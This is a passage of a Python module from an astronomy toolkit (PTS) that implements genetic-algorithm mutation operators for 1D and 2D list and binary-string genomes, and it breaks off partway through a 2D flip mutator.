] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/evolve/Mutators.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.evolve.mutators In this module we have the genetic operators of mutation for each chromosome
# representation.
#
# -----------------------------------------------------------------
# Import other evolve modules
import utils
import constants
import tree
# Import the relevant PTS classes and modules
from ..core.tools.random import prng
# -----------------------------------------------------------------
def G1DBinaryStringMutatorSwap(genome, **args):
    """ The 1D Binary String Swap Mutator

    Swaps pairs of positions in the binary string.  When the expected number
    of mutations (pmut * length) is below one, each position is instead
    swapped with probability pmut.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0

    length = len(genome)
    expected = pmut * length

    if expected >= 1.0:
        # perform a fixed number of random pair swaps
        for _ in xrange(int(round(expected))):
            utils.listSwapElement(genome, prng.randint(0, length), prng.randint(0, length))
        return int(expected)

    # low mutation rate: decide independently for every position
    performed = 0
    for position in xrange(length):
        if utils.randomFlipCoin(pmut):
            utils.listSwapElement(genome, position, prng.randint(0, length))
            performed += 1
    return performed
# -----------------------------------------------------------------
def G1DBinaryStringMutatorFlip(genome, **args):
    """ The classical flip mutator for binary strings

    Inverts individual bits.  When the expected number of mutations
    (pmut * length) is below one, each bit is instead flipped with
    probability pmut.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0

    length = len(genome)
    expected = pmut * length

    if expected >= 1.0:
        # flip a fixed number of randomly chosen bits
        for _ in xrange(int(round(expected))):
            position = prng.randint(0, length)
            genome[position] = 1 if genome[position] == 0 else 0
        return int(expected)

    # low mutation rate: decide independently for every bit
    flipped = 0
    for position in xrange(length):
        if utils.randomFlipCoin(pmut):
            genome[position] = 1 if genome[position] == 0 else 0
            flipped += 1
    return flipped
# -----------------------------------------------------------------
def G1DListMutatorSwap(genome, **args):
    """ The mutator of G1DList, Swap Mutator

    Swaps pairs of elements in the list.  When the expected number of
    mutations (pmut * length) is below one, each element is instead swapped
    with probability pmut.

    .. note:: this mutator is :term:`Data Type Independent`
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0

    size = len(genome)
    expected = pmut * size

    if expected >= 1.0:
        # perform a fixed number of random pair swaps
        for _ in xrange(int(round(expected))):
            utils.listSwapElement(genome, prng.randint(0, size), prng.randint(0, size))
        return int(expected)

    # low mutation rate: decide independently for every element
    performed = 0
    for index in xrange(size):
        if utils.randomFlipCoin(pmut):
            utils.listSwapElement(genome, index, prng.randint(0, size))
            performed += 1
    return performed
# -----------------------------------------------------------------
def G1DListMutatorSIM(genome, **args):
    """
    The mutator of G1DList, Simple Inversion Mutation

    Draws two random cut points and, with probability ``pmut``, reverses the
    sublist between them in place.  Returns the number of mutations applied
    (0 or 1).

    .. note:: this mutator is :term:`Data Type Independent`
    """
    mutations = 0
    if args["pmut"] <= 0.0:
        return 0

    # draw two cut points in [0, len(genome)]; the upper bound is passed as
    # len+1 because the rng excludes its upper bound
    cuts = [prng.randint(0, len(genome) + 1), prng.randint(0, len(genome) + 1)]  # HERE IT SHOULD BE INCLUSIVE

    # order the cut points so cuts[0] <= cuts[1]
    if cuts[0] > cuts[1]:
        utils.listSwapElement(cuts, 0, 1)

    # try to guarantee a non-empty slice by re-drawing the second cut
    if (cuts[1] - cuts[0]) <= 0:
        cuts[1] = prng.randint(cuts[0], len(genome) + 1)  # HERE IT SHOULD BE INCLUSIVE

    if utils.randomFlipCoin(args["pmut"]):
        part = genome[cuts[0]:cuts[1]]
        if len(part) == 0:
            # re-draw above may still have produced an empty slice
            return 0
        part.reverse()
        # write the reversed slice back into the genome
        genome[cuts[0]:cuts[1]] = part
        mutations += 1

    return mutations
# -----------------------------------------------------------------
def G1DListMutatorIntegerRange(genome, **args):
    """ Simple integer range mutator for G1DList

    Replaces genes with fresh integers drawn uniformly from
    [rangemin, rangemax].  Accepts the *rangemin* and *rangemax* genome
    parameters, both optional.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0

    size = len(genome)
    expected = pmut * size

    if expected >= 1.0:
        # re-draw a fixed number of randomly chosen genes
        for _ in xrange(int(round(expected))):
            index = prng.randint(0, size)
            genome[index] = prng.randint(genome.getParam("rangemin", constants.CDefRangeMin),
                                         genome.getParam("rangemax", constants.CDefRangeMax) + 1)  # +1: inclusive upper bound
        return int(expected)

    # low mutation rate: decide independently for every gene
    performed = 0
    for index in xrange(size):
        if utils.randomFlipCoin(pmut):
            genome[index] = prng.randint(genome.getParam("rangemin", constants.CDefRangeMin),
                                         genome.getParam("rangemax", constants.CDefRangeMax) + 1)  # +1: inclusive upper bound
            performed += 1
    return performed
# -----------------------------------------------------------------
def G1DListMutatorRealRange(genome, **args):
    """Simple real range mutator for G1DList.

    Accepts the *rangemin* and *rangemax* genome parameters, both optional.
    Mutated genes are redrawn uniformly in [rangemin, rangemax).
    Returns the number of mutations performed.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    listSize = len(genome)
    expected = pmut * (listSize)
    if expected < 1.0:
        # Low expected count: flip a biased coin for every gene.
        count = 0
        for idx in xrange(listSize):
            if utils.randomFlipCoin(pmut):
                genome[idx] = prng.uniform(
                    genome.getParam("rangemin", constants.CDefRangeMin),
                    genome.getParam("rangemax", constants.CDefRangeMax))
                count += 1
        return count
    # High expected count: mutate round(expected) randomly chosen genes
    # (a gene may be picked more than once).
    for _ in xrange(int(round(expected))):
        target = prng.randint(0, listSize)
        genome[target] = prng.uniform(
            genome.getParam("rangemin", constants.CDefRangeMin),
            genome.getParam("rangemax", constants.CDefRangeMax))
    return int(expected)
# -----------------------------------------------------------------
def HeterogeneousListMutatorRealRange(genome, **args):
    """
    Real range mutator for HeterogeneousList

    Each mutated gene is redrawn uniformly within its own per-gene bounds
    taken from the "minima" and "maxima" genome parameters (assumed to be
    sequences parallel to the genome -- TODO confirm they are always set).

    :param genome: the heterogeneous list genome, mutated in place
    :param args: must contain "pmut", the per-gene mutation probability
    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * (listSize)
    if mutations < 1.0:
        # Low expected count: flip a biased coin per gene.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(args["pmut"]):
                genome[it] = prng.uniform(genome.getParam("minima")[it], genome.getParam("maxima")[it])
                mutations += 1
    else:
        # High expected count: mutate round(mutations) randomly chosen
        # genes (a gene may be picked more than once).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            genome[which_gene] = prng.uniform(genome.getParam("minima")[which_gene], genome.getParam("maxima")[which_gene])
    return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerGaussianGradient(genome, **args):
    """ A gaussian mutator for G1DList of Integers

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. The
    random distribution is set with mu=1.0 and std=0.0333

    Same as IntegerGaussian, except that this uses relative gradient rather than
    absolute gaussian. A value is randomly generated about gauss(mu=1, sigma=.0333)
    and multiplied by the gene to drift it up or down (depending on what side of
    1 the random value falls on) and cast to integer

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * (listSize)
    mu = constants.CDefGaussianGradientMU
    sigma = constants.CDefGaussianGradientSIGMA
    if mutations < 1.0:
        # Low expected count: per-gene biased coin flips.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(args["pmut"]):
                # abs() keeps the multiplicative factor non-negative.
                final_value = int(genome[it] * abs(prng.normal(mu, sigma)))
                # Clamp the result into [rangemin, rangemax].
                final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                genome[it] = final_value
                mutations += 1
    else:
        # High expected count: mutate round(mutations) randomly chosen
        # genes (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            final_value = int(genome[which_gene] * abs(prng.normal(mu, sigma)))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome[which_gene] = final_value
    return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerGaussian(genome, **args):
    """Gaussian mutator for a G1DList of integers.

    Accepts the *rangemin* and *rangemax* genome parameters, both
    optional, plus *gauss_mu* and *gauss_sigma*, the mean and std. dev.
    of the perturbation distribution. Returns the number of mutations
    performed.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    listSize = len(genome)
    expected = pmut * (listSize)
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG1DListMutIntMU
    if sigma is None:
        sigma = constants.CDefG1DListMutIntSIGMA

    def _perturb(value):
        # Add an integer-truncated gaussian offset, clamped into
        # [rangemin, rangemax].
        new_value = value + int(prng.normal(mu, sigma))
        new_value = min(new_value, genome.getParam("rangemax", constants.CDefRangeMax))
        return max(new_value, genome.getParam("rangemin", constants.CDefRangeMin))

    if expected < 1.0:
        # Low expected count: per-gene biased coin flips.
        count = 0
        for idx in xrange(listSize):
            if utils.randomFlipCoin(pmut):
                genome[idx] = _perturb(genome[idx])
                count += 1
        return count
    # High expected count: perturb round(expected) randomly chosen genes.
    for _ in xrange(int(round(expected))):
        target = prng.randint(0, listSize)
        genome[target] = _perturb(genome[target])
    return int(expected)
# -----------------------------------------------------------------
def G1DListMutatorRealGaussian(genome, **args):
    """
    The mutator of G1DList, Gaussian Mutator

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
    accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
    represents the mean and the std. dev. of the random distribution.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * (listSize)
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG1DListMutRealMU
    if sigma is None:
        sigma = constants.CDefG1DListMutRealSIGMA
    if mutations < 1.0:
        # Low expected count: per-gene biased coin flips.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(args["pmut"]):
                # Additive gaussian offset, clamped into [rangemin, rangemax].
                final_value = genome[it] + prng.normal(mu, sigma)
                final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                genome[it] = final_value
                mutations += 1
    else:
        # High expected count: perturb round(mutations) randomly chosen
        # genes (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            final_value = genome[which_gene] + prng.normal(mu, sigma)
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome[which_gene] = final_value
    return int(mutations)
# -----------------------------------------------------------------
def HeterogeneousListMutatorRealGaussian(genome, **args):
    """
    Heterogeneous version of the real gaussian list mutator.

    Each mutated gene receives an additive gaussian offset and is then
    clamped into its own per-gene bounds from the "minima" and "maxima"
    genome parameters (assumed parallel to the genome -- TODO confirm).

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * (listSize)
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG1DListMutRealMU
    if sigma is None:
        sigma = constants.CDefG1DListMutRealSIGMA
    if mutations < 1.0:
        # Low expected count: per-gene biased coin flips.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(args["pmut"]):
                final_value = genome[it] + prng.normal(mu, sigma)
                # Clamp into this gene's own [minima[it], maxima[it]] range.
                final_value = min(final_value, genome.getParam("maxima")[it])
                final_value = max(final_value, genome.getParam("minima")[it])
                genome[it] = final_value
                mutations += 1
    else:
        # High expected count: perturb round(mutations) randomly chosen
        # genes (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            final_value = genome[which_gene] + prng.normal(mu, sigma)
            final_value = min(final_value, genome.getParam("maxima")[which_gene])
            final_value = max(final_value, genome.getParam("minima")[which_gene])
            genome[which_gene] = final_value
    return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorRealGaussianGradient(genome, **args):
    """ The mutator of G1DList, Gaussian Gradient Mutator

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. The
    random distribution is set with mu=1.0 and std=0.0333

    The difference between this routine and the normal Gaussian Real is that the
    other function generates a gaussian value and adds it to the value. If the
    mu is 0, and the std is 1, a typical value could be 1.8 or -0.5. These small
    values are fine if your range is 0-10, but if your range is much larger, like
    0-100,000, a relative gradient makes sense.

    This routine generates a gaussian value with mu=1.0 and std=0.0333 and then
    the gene is multiplied by this value. This will cause the gene to drift
    no matter how large it is.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * (listSize)
    mu = constants.CDefGaussianGradientMU
    sigma = constants.CDefGaussianGradientSIGMA
    if mutations < 1.0:
        # Low expected count: per-gene biased coin flips.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(args["pmut"]):
                # Multiplicative drift; abs() keeps the factor non-negative.
                final_value = genome[it] * abs(prng.normal(mu, sigma))
                # Clamp into [rangemin, rangemax].
                final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                genome[it] = final_value
                mutations += 1
    else:
        # High expected count: mutate round(mutations) randomly chosen
        # genes (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            final_value = genome[which_gene] * abs(prng.normal(mu, sigma))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome[which_gene] = final_value
    return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerBinary(genome, **args):
    """Binary mutator for G1DList: toggles 0 <-> 1 elements at random.

    Elements that are neither 0 nor 1 are left untouched. Returns the
    number of mutations performed.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    listSize = len(genome)
    expected = pmut * (listSize)
    if expected < 1.0:
        # Low expected count: per-gene biased coin flips. Note the count
        # is incremented even when the gene is not 0/1, matching the
        # historical behaviour.
        count = 0
        for idx in xrange(listSize):
            if utils.randomFlipCoin(pmut):
                if genome[idx] == 0:
                    genome[idx] = 1
                elif genome[idx] == 1:
                    genome[idx] = 0
                count += 1
        return count
    # High expected count: toggle round(expected) randomly chosen genes.
    for _ in xrange(int(round(expected))):
        target = prng.randint(0, listSize)
        if genome[target] == 0:
            genome[target] = 1
        elif genome[target] == 1:
            genome[target] = 0
    return int(expected)
# -----------------------------------------------------------------
def G1DListMutatorAllele(genome, **args):
    """Allele mutator for G1DList.

    Requires the *allele* genome parameter holding a
    :class:`GAllele.GAlleles` instance; raises TypeError otherwise.
    Mutated genes are replaced by a random allele from their own allele
    set. Returns the number of mutations performed.
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    listSize = len(genome)
    expected = pmut * listSize
    allele = genome.getParam("allele", None)
    if allele is None:
        utils.raiseException("to use the G1DListMutatorAllele, you must specify the 'allele' parameter", TypeError)
    if expected < 1.0:
        # Low expected count: per-gene biased coin flips.
        count = 0
        for idx in xrange(listSize):
            if utils.randomFlipCoin(pmut):
                genome[idx] = allele[idx].getRandomAllele()
                count += 1
        return count
    # High expected count: replace round(expected) randomly chosen genes.
    for _ in xrange(int(round(expected))):
        target = prng.randint(0, listSize)
        genome[target] = allele[target].getRandomAllele()
    return int(expected)
# -----------------------------------------------------------------
def G1DListMutatorAlleleGaussian(genome, **arguments):
    """An allele-based mutator based on G1DListMutatorRealGaussian.

    Accepts the parameter *gauss_mu* and the *gauss_sigma* which
    respectively represents the mean and the std. dev. of the random
    distribution. Requires the *allele* genome parameter; each allele
    must expose a single (min, max) range via ``beginEnd`` (asserted).

    :return: number of mutations performed (int)
    """
    if arguments["pmut"] <= 0.0:
        return 0
    listSize = len(genome)
    # Expected number of mutations at this rate.
    mutations = arguments["pmut"] * listSize
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG1DListMutRealMU
    if sigma is None:
        sigma = constants.CDefG1DListMutRealSIGMA
    allele = genome.getParam("allele", None)
    if allele is None:
        utils.raiseException("to use this mutator, you must specify the 'allele' parameter", TypeError)
    if mutations < 1.0:
        # Low expected count: per-gene biased coin flips.
        mutations = 0
        for it in xrange(listSize):
            if utils.randomFlipCoin(arguments["pmut"]):
                final_value = genome[it] + prng.normal(mu, sigma)
                # Only single-range alleles are supported here.
                assert len(allele[it].beginEnd) == 1, "only single ranges are supported"
                rangemin, rangemax = allele[it].beginEnd[0]
                # Clamp into this allele's own range.
                final_value = min(final_value, rangemax)
                final_value = max(final_value, rangemin)
                genome[it] = final_value
                mutations += 1
    else:
        # High expected count: perturb round(mutations) randomly chosen
        # genes (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_gene = prng.randint(0, listSize)
            final_value = genome[which_gene] + prng.normal(mu, sigma)
            assert len(allele[which_gene].beginEnd) == 1, "only single ranges are supported"
            rangemin, rangemax = allele[which_gene].beginEnd[0]
            final_value = min(final_value, rangemax)
            final_value = max(final_value, rangemin)
            genome[which_gene] = final_value
    return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorSwap(genome, **args):
    """Swap mutator for G2DList: exchanges pairs of random cells.

    .. note:: this mutator is :term:`Data Type Independent`
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    expected = pmut * elements
    if expected < 1.0:
        # Low expected count: per-cell biased coin flips; each hit swaps
        # the current cell with a random partner.
        count = 0
        for row in xrange(height):
            for col in xrange(width):
                if utils.randomFlipCoin(pmut):
                    partner = (prng.randint(0, height), prng.randint(0, width))
                    utils.list2DSwapElement(genome.genomeList, (row, col), partner)
                    count += 1
        return count
    # High expected count: swap round(expected) random cell pairs.
    for _ in xrange(int(round(expected))):
        first = (prng.randint(0, height), prng.randint(0, width))
        second = (prng.randint(0, height), prng.randint(0, width))
        utils.list2DSwapElement(genome.genomeList, first, second)
    return int(expected)
# -----------------------------------------------------------------
def G2DListMutatorIntegerRange(genome, **args):
    """ Simple integer range mutator for G2DList

    Accepts the *rangemin* and *rangemax* genome parameters, both optional.
    Mutated cells are redrawn uniformly in [rangemin, rangemax].

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    range_min = genome.getParam("rangemin", constants.CDefRangeMin)
    range_max = genome.getParam("rangemax", constants.CDefRangeMax)
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    # +1 makes the upper bound inclusive.
                    random_int = prng.randint(range_min, range_max + 1)
                    genome.setItem(i, j, random_int)
                    mutations += 1
    else:
        # High expected count: redraw round(mutations) random cells
        # (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            random_int = prng.randint(range_min, range_max + 1)  # inclusive upper bound
            genome.setItem(which_y, which_x, random_int)
    return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorIntegerGaussianGradient(genome, **args):
    """
    A gaussian mutator for G2DList of Integers

    Accepts the *rangemin* and *rangemax* genome parameters, both optional.

    This routine generates a gaussian value with mu=1.0 and std=0.0333 and then
    the gene is multiplied by this value. This will cause the gene to drift
    no matter how large it is.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = constants.CDefGaussianGradientMU
    sigma = constants.CDefGaussianGradientSIGMA
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    # Multiplicative drift, truncated to int and clamped
                    # into [rangemin, rangemax].
                    final_value = int(genome[i][j] * abs(prng.normal(mu, sigma)))
                    final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                    final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                    genome.setItem(i, j, final_value)
                    mutations += 1
    else:
        # High expected count: mutate round(mutations) random cells
        # (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            final_value = int(genome[which_y][which_x] * abs(prng.normal(mu, sigma)))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome.setItem(which_y, which_x, final_value)
    return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorIntegerGaussian(genome, **args):
    """
    A gaussian mutator for G2DList of Integers

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
    accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
    represents the mean and the std. dev. of the random distribution.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG2DListMutIntMU
    if sigma is None:
        sigma = constants.CDefG2DListMutIntSIGMA
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    # Integer-truncated gaussian offset, clamped into
                    # [rangemin, rangemax].
                    final_value = genome[i][j] + int(prng.normal(mu, sigma))
                    final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                    final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                    genome.setItem(i, j, final_value)
                    mutations += 1
    else:
        # High expected count: perturb round(mutations) random cells
        # (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            final_value = genome[which_y][which_x] + int(prng.normal(mu, sigma))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome.setItem(which_y, which_x, final_value)
    return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorAllele(genome, **args):
    """Allele mutator for G2DList.

    Requires the *allele* genome parameter (a :class:`GAllele.GAlleles`
    instance); that instance must have the homogeneous flag enabled, as
    the single allele set ``allele[0]`` is used for every cell.

    .. warning:: the :class:`GAllele.GAlleles` instance must have the homogeneous flag enabled
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    # Mirrors the historical computation: (h*w - 1) + 1 == h*w cells.
    listSize = genome.getHeight() * genome.getWidth() - 1
    expected = pmut * (listSize + 1)
    allele = genome.getParam("allele", None)
    if allele is None:
        utils.raiseException("to use the G2DListMutatorAllele, you must specify the 'allele' parameter", TypeError)
    if not allele.homogeneous:
        utils.raiseException("to use the G2DListMutatorAllele, the 'allele' must be homogeneous")
    if expected < 1.0:
        # Low expected count: per-cell biased coin flips.
        count = 0
        for row in xrange(genome.getHeight()):
            for col in xrange(genome.getWidth()):
                if utils.randomFlipCoin(pmut):
                    genome.setItem(row, col, allele[0].getRandomAllele())
                    count += 1
        return count
    # High expected count: replace round(expected) random cells.
    for _ in xrange(int(round(expected))):
        row = prng.randint(0, genome.getHeight())  # first draw: row index
        col = prng.randint(0, genome.getWidth())   # second draw: column index
        genome.setItem(row, col, allele[0].getRandomAllele())
    return int(expected)
# -----------------------------------------------------------------
def G2DListMutatorRealGaussian(genome, **args):
    """ A gaussian mutator for G2DList of Real

    Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
    accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
    represents the mean and the std. dev. of the random distribution.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = genome.getParam("gauss_mu")
    sigma = genome.getParam("gauss_sigma")
    if mu is None:
        mu = constants.CDefG2DListMutRealMU
    if sigma is None:
        sigma = constants.CDefG2DListMutRealSIGMA
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    # Additive gaussian offset, clamped into
                    # [rangemin, rangemax].
                    final_value = genome[i][j] + prng.normal(mu, sigma)
                    final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                    final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                    genome.setItem(i, j, final_value)
                    mutations += 1
    else:
        # High expected count: perturb round(mutations) random cells
        # (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            final_value = genome[which_y][which_x] + prng.normal(mu, sigma)
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome.setItem(which_y, which_x, final_value)
    return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorRealGaussianGradient(genome, **args):
    """ A gaussian gradient mutator for G2DList of Real

    Accepts the *rangemin* and *rangemax* genome parameters, both optional.

    The difference is that this multiplies the gene by gauss(1.0, 0.0333), allowing
    for a smooth gradient drift about the value.

    :return: number of mutations performed (int)
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    mu = constants.CDefGaussianGradientMU
    sigma = constants.CDefGaussianGradientSIGMA
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    # Multiplicative drift; abs() keeps the factor
                    # non-negative. Clamped into [rangemin, rangemax].
                    final_value = genome[i][j] * abs(prng.normal(mu, sigma))
                    final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
                    final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
                    genome.setItem(i, j, final_value)
                    mutations += 1
    else:
        # High expected count: mutate round(mutations) random cells
        # (duplicates possible).
        for it in xrange(int(round(mutations))):
            which_x = prng.randint(0, genome.getWidth())
            which_y = prng.randint(0, genome.getHeight())
            final_value = genome[which_y][which_x] * abs(prng.normal(mu, sigma))
            final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
            final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
            genome.setItem(which_y, which_x, final_value)
    return int(mutations)
# -----------------------------------------------------------------
def G2DBinaryStringMutatorSwap(genome, **args):
    """Swap mutator for G2DBinaryString: exchanges pairs of random cells.

    .. versionadded:: 0.6
       The *G2DBinaryStringMutatorSwap* function
    """
    pmut = args["pmut"]
    if pmut <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    expected = pmut * elements
    if expected < 1.0:
        # Low expected count: per-cell biased coin flips; each hit swaps
        # the current cell with a random partner.
        count = 0
        for row in xrange(height):
            for col in xrange(width):
                if utils.randomFlipCoin(pmut):
                    partner = (prng.randint(0, height), prng.randint(0, width))
                    utils.list2DSwapElement(genome.genomeString, (row, col), partner)
                    count += 1
        return count
    # High expected count: swap round(expected) random cell pairs.
    for _ in xrange(int(round(expected))):
        first = (prng.randint(0, height), prng.randint(0, width))
        second = (prng.randint(0, height), prng.randint(0, width))
        utils.list2DSwapElement(genome.genomeString, first, second)
    return int(expected)
# -----------------------------------------------------------------
def G2DBinaryStringMutatorFlip(genome, **args):
    """ A flip mutator for G2DBinaryString

    Each mutated cell is toggled 0 <-> 1. Returns the number of
    mutations performed.

    .. versionadded:: 0.6
       The *G2DBinaryStringMutatorFlip* function
    """
    if args["pmut"] <= 0.0:
        return 0
    height, width = genome.getSize()
    elements = height * width
    # Expected number of mutations at this rate.
    mutations = args["pmut"] * elements
    if mutations < 1.0:
        # Low expected count: per-cell biased coin flips.
        mutations = 0
        for i in xrange(genome.getHeight()):
            for j in xrange(genome.getWidth()):
                if utils.randomFlipCoin(args["pmut"]):
                    if genome[i][j] == 0:
                        genome.setItem(i, j, 1)
                    else:
